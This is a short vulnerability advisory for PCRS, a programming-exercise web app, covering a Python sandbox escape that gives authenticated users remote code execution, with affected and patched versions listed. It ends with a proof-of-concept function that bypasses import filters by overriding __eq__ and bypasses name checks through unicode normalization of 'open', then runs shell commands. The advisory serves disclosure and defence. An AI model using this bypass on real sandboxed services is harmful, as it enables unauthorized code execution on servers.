PCRS is a webapp for online programming exercises developed at the University of Toronto. See Bitbucket repository: https://bitbucket.org/utmandrew/pcrs/src/3.11/

PCRS “Questions” page with code submission and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing.

Remote code execution can be achieved in PCRS instances through the use of generator objects. By using generator frames (gi_frame) and f_back, scripts can traverse out of a sandboxed stack frame and execute malicious code in an unsandboxed environment. Additionally, unicode normalization can easily bypass basic input sanitization. Any authenticated user with minimum privileges can perform this attack. See PoC for more details.

• PCRS <= 3.11 d0de1e with Python execution.
• Patch implemented in 9326ad3 with partial mitigation in fbaedd3.

Crafting secure isolation mechanisms from scratch is prone to oversights and vulnerabilities. As always, it is better to sandbox an execution environment than a language.

Overriding __eq__ can be used in a restricted environment:

def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s